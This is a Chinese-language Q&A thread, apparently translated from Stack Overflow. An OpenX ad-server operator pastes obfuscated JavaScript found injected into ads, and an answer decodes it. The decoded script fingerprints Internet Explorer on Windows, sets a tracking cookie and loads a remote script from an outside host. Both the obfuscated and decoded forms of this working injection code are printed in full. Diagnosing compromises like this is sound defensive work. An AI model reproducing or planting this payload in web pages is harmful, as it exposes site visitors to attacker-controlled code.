1

我在我的网站上运行 OpenX Ad 服务器,最近我注意到广告中显示的奇怪代码。我不确定这是否是 OpenX 代码的一部分,或者应用程序是否以某种方式受到损害。也许有 javascript 知识的人可以为我解释一下。这是代码:

<script>try{_=~[];_={___:++_,$$$$:(![]+"")[_],__$:++_,$_$_:(![]+"")[_],_$_:++_,$_$$:({}+"")[_],$$_$:(_[_]+"")[_],_$$:++_,$$$_:(!""+"")[_],$__:++_,$_$:++_,$$__:({}+"")[_],$$_:++_,$$$:++_,$___:++_,$__$:++_};_.$_=(_.$_=_+"")[_.$_$]+(_._$=_.$_[_.__$])+(_.$$=(_.$+"")[_.__$])+((!_)+"")[_._$$]+(_.__=_.$_[_.$$_])+(_.$=(!""+"")[_.__$])+(_._=(!""+"")[_._$_])+_.$_[_.$_$]+_.__+_._$+_.$;_.$$=_.$+(!""+"")[_._$$]+_.__+_._+_.$+_.$$;_.$=(_.___)[_.$_][_.$_];_.$(_.$(_.$$+"\""+_.$$_$+"="+_.$$_$+_._$+_.$$__+_._+"\\"+_.__$+_.$_$+_.$_$+_.$$$_+"\\"+_.__$+_.$_$+_.$$_+_.__+";"+_._+_.$_$_+"=\\"+_.__$+_.$_$+_.$$_+_.$_$_+"\\"+_.__$+_.$$_+_.$$_+"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$__+_.$$$+_.$_$_+_.__+_._$+"\\"+_.__$+_.$$_+_._$_+"."+_._+"\\"+_.__$+_.$$_+_._$$+_.$$$_+"\\"+_.__$+_.$$_+_._$_+"\\"+_.__$+_.___+_.__$+"\\"+_.__$+_.$__+_.$$$+_.$$$_+"\\"+_.__$+_.$_$+_.$$_+_.__+";\\"+_.__$+_.$_$+_.__$+_.$$$$+"("+_.$$_$+"._\\"+_.__$+_.$$$+_._$_+"\\"+_.__$+_.$$$+_.___+"==="+_._+"\\"+_.__$+_.$_$+_.$$_+_.$$_$+_.$$$_+_.$$$$+"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$_$+_.$$_+_.$$$_+_.$$_$+"\\"+_.$__+_.___+"&&\\"+_.$__+_.___+_.$$_$+"."+_.$$__+_._$+_._$+"\\"+_.__$+_.$_$+_._$$+"\\"+_.__$+_.$_$+_.__$+_.$$$_+".\\"+_.__$+_.$$_+_._$$+_.$$$_+_.$_$_+"\\"+_.__$+_.$$_+_._$_+_.$$__+"\\"+_.__$+_.$_$+_.___+"('_"+_._+_.__+"\\"+_.__$+_.$_$+_.$_$+_._+_.$$_$+"=')==-"+_.__$+"\\"+_.$__+_.___+"&&\\"+_.$__+_.___+_._+_.$_$_+".\\"+_.__$+_.$$_+_._$$+_.$$$_+_.$_$_+"\\"+_.__$+_.$$_+_._$_+_.$$__+"\\"+_.__$+_.$_$+_.___+"('\\"+_.__$+_._$_+_.$$$+"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$_$+_.$$_+_.$$_$+_._$+"\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_._$$+"\\"+_.$__+_.___+"\\"+_.__$+_.__$+_.$$_+"\\"+_.__$+_._$_+_.$__+"\\"+_.$__+_.___+"')>"+_.___+"\\"+_.$__+_.___+"&&\\"+_.$__+_.___+_._+_.$_$_+".\\"+_.__$+_.$$_+_._$$+_.$$$_+_.$_$_+"\\"+_.__$+_.$$_+_._$_+_.$$__+"\\"+_.__$+_.$_$+_.___+"('\\"+_.__$+_.__$+_.$_$+"\\"+_.__$+_._$_+_._$$+"\\"+_.__$+_.__$+_.__$+"\\"+_.__$+_.___+_.$_$+"\\"+_.$__+_.___+"')>"+_.___+")\\"+_.$__+_.___+"{"+_.$$_$+"._\\"+_.__$+_.$$$+_._$_+"\\"+_.__$+_.$$$+_.___+"="+_.__$+";"+_.$$_$+"."+_.$$__+_._$+_._$+"\\"+_.__$+_.$_$+_._$$+"\\"+_.__$+_.$_$+_.__$+_.$$$_+"='__"+_._+_.__+"\\"+_.__$+_.$_$+_.$_$+_._+_.$$_$+"="+_.__$+";\\"+_.$__+_.___+_.$$$_+"\\"+_.__$+_.$$$+_.___+"\\"+_.__$+_.$$_+_.___+"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$$_+_._$_+_.$$$_+"\\"+_.__$+_.$$_+_._$$+"=\\"+_.__$+_._$_+_.$$$+_.$$$_+_.$$_$+",\\"+_.$__+_.___+_.___+_.__$+"\\"+_.$__+_.___+"\\"+_.__$+_.__$+_._$_+_.$_$_+"\\"+_.__$+_.$_$+_.$$_+"\\"+_.$__+_.___+_._$_+_.___+_._$_+_.___+"\\"+_.$__+_.___+_.___+_.___+":"+_.___+_.___+":"+_.___+_.___+"\\"+_.$__+_.___+"\\"+_.__$+_._$_+_.$_$+"\\"+_.__$+_._$_+_.$__+"\\"+_.__$+_.___+_._$$+";\\"+_.$__+_.___+"\\"+_.__$+_.$$_+_.___+_.$_$_+_.__+"\\"+_.__$+_.$_$+_.___+"=/';"+_.$$_$+".\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_._$_+"\\"+_.__$+_.$_$+_.__$+_.__+_.$$$_+(![]+"")[_._$_]+"\\"+_.__$+_.$_$+_.$$_+"(\\\"<\\"+_.__$+_.$$_+_._$$+_.$$__+"\\"+_.__$+_.$$_+_._$_+"\\\"+\\\"\\"+_.__$+_.$_$+_.__$+"\\"+_.__$+_.$$_+_.___+_.__+"\\"+_.$__+_.___+"\\"+_.__$+_.$$_+_._$$+"\\"+_.__$+_.$$_+_._$_+_.$$__+"='\\"+_.__$+_.$_$+_.___+_.__+_.__+"\\"+_.__$+_.$$_+_.___+"://\\"+_.__$+_.$__+_.$$$+_.$_$_+(![]+"")[_._$_]+_.$$$_+_.__+_._$+"."+_.$$$_+_._+"/"+_.$_$+_.$$_$+_.$$_+_._$_+_.___+_.$$_+_.$$_$+_.$$_$+".\\"+_.__$+_.$_$+_._$_+"\\"+_.__$+_.$$_+_._$$+"?"+_.$$__+"\\"+_.__$+_.$$_+_.___+"=\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_.$$$+"."+_.$_$$+"\\"+_.__$+_.$$_+_._$_+_.$_$_+"\\"+_.__$+_.$$_+_.$$_+_.$_$_+"\\"+_.__$+_.$_$+_.$$_+_.$$$_+"\\"+_.__$+_.$$_+_.$$$+"\\"+_.__$+_.$$_+_._$$+"."+_.$$__+_._$+"\\"+_.__$+_.$_$+_.$_$+"'></\\"+_.__$+_.$$_+_._$$+_.$$__+"\\"+_.__$+_.$$_+_._$_+"\\"+_.__$+_.$_$+_.__$+"\\\"+\\\"\\"+_.__$+_.$$_+_.___+_.__+">\\\");}"+"\"")())();}catch(e){}</script>
4

1 回答 1

2

评估时,混淆代码将定义此函数并执行它:

function anonymous() {
    d=document;ua=navigator.userAgent;
    if(d._zx===undefined && d.cookie.search('_utmud=')==-1 && ua.search('Windows NT ')>0 && ua.search('MSIE ')>0) {
        d._zx=1;d.cookie='__utmud=1; expires=Wed, 01 Jan 2020 00:00:00 UTC; path=/';
        d.writeln("<scr"+"ipt src='http://galeto.eu/5d6206dd.js?cp=www.domain.com'></scri"+"pt>");
    }
}

基本上,它设置了一个 cookie 并加载了一个附加的 JavaScript 文件。

于 2013-07-03T18:40:58.013 回答